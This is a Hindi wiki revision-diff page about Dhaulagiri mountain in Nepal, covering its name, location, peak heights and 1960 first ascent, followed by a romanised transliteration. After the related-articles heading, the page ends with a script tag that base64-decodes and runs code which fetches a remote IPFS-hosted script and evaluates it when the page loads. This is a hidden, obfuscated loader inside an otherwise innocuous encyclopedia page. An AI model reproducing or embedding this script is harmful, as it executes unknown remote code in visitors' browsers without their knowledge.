Difference between revisions of "धौलगिरि पर्वत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*इसका नाम दो [[संस्कृत]] शब्दों से लिया गया है, जिनका अर्थ है ‘श्वेत पर्वत’ ।
+
[[चित्र:Dhaulagiri-Mountain.jpg|thumb|250px|धौलगिरि पर्वत]]
*उत्तर-मध्य [[नेपाल]] में [[हिमालय]] की पर्वत श्रंखला का भाग है।  
+
'''धौलगिरि पर्वत''' उत्तर-मध्य [[नेपाल]] में [[हिमालय]] की पर्वत श्रृंखला का भाग है। इसका नाम दो [[संस्कृत]] शब्दों से लिया गया है, जिनका अर्थ है 'श्वेत पर्वत'।
 
*गहरी काली [[गंडक नदी]] घाटी के पश्चिम की ओर स्थित है।  
 
*गहरी काली [[गंडक नदी]] घाटी के पश्चिम की ओर स्थित है।  
 
*बर्फ़ से ढकी इसकी कई चोटियां 7,620 मीटर से अधिक ऊंची हैं, जिनमें धौलगिरी प्रथम, द्वितीय, तृतीय एवं चतुर्थ शामिल हैं।  
 
*बर्फ़ से ढकी इसकी कई चोटियां 7,620 मीटर से अधिक ऊंची हैं, जिनमें धौलगिरी प्रथम, द्वितीय, तृतीय एवं चतुर्थ शामिल हैं।  
 
*8,167 मीटर ऊंचा 'धौलगिरि प्रथम' विश्व के सबसे ऊंचे पर्वतों में से एक है।  
 
*8,167 मीटर ऊंचा 'धौलगिरि प्रथम' विश्व के सबसे ऊंचे पर्वतों में से एक है।  
*13 मई 1960 को मैक्स आइजेलिन के नेतृत्व में स्विस अभियान दल के इसके शिखर पर सबसे पहले पहुँचा। इनके पहुंचने से पहले तक 4,600 मीटर ऊंची दक्षिणी दीवार, चोटी की खड़ी
+
*[[13 मई]] [[1960]] को मैक्स आइजेलिन के नेतृत्व में स्विस अभियान दल के इसके शिखर पर सबसे पहले पहुँचा। इनके पहुंचने से पहले तक 4,600 मीटर ऊंची दक्षिणी दीवार, चोटी की खड़ी ढलानों तथा विषम जलवायु के कारण कोई इस पर नहीं चढ़ पाया था।  
ढलानों तथा विषम जलवायु के कारण कोई इस पर नहीं चढ़ पाया था।  
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Dhaulagiri-Mountain-1.jpg|धौलगिरि पर्वत
 +
चित्र:Dhaulagiri-Mountain-2.jpg|धौलगिरि पर्वत
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{पर्वत}}
 
{{पर्वत}}

Latest revision as of 10:16, 9 February 2021

thumb|250px|dhaulagiri parvat dhaulagiri parvat uttar-madhy nepal mean himalay ki parvat shrriankhala ka bhag hai. isaka nam do sanskrit shabdoan se liya gaya hai, jinaka arth hai 'shvet parvat'.

  • gahari kali gandak nadi ghati ke pashchim ki or sthit hai.
  • barf se dhaki isaki kee chotiyaan 7,620 mitar se adhik ooanchi haian, jinamean dhaulagiri pratham, dvitiy, tritiy evan chaturth shamil haian.
  • 8,167 mitar ooancha 'dhaulagiri pratham' vishv ke sabase ooanche parvatoan mean se ek hai.
  • 13 mee 1960 ko maiks aijelin ke netritv mean svis abhiyan dal ke isake shikhar par sabase pahale pahuancha. inake pahuanchane se pahale tak 4,600 mitar ooanchi dakshini divar, choti ki kh di dhalanoan tatha visham jalavayu ke karan koee is par nahian chadh paya tha.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>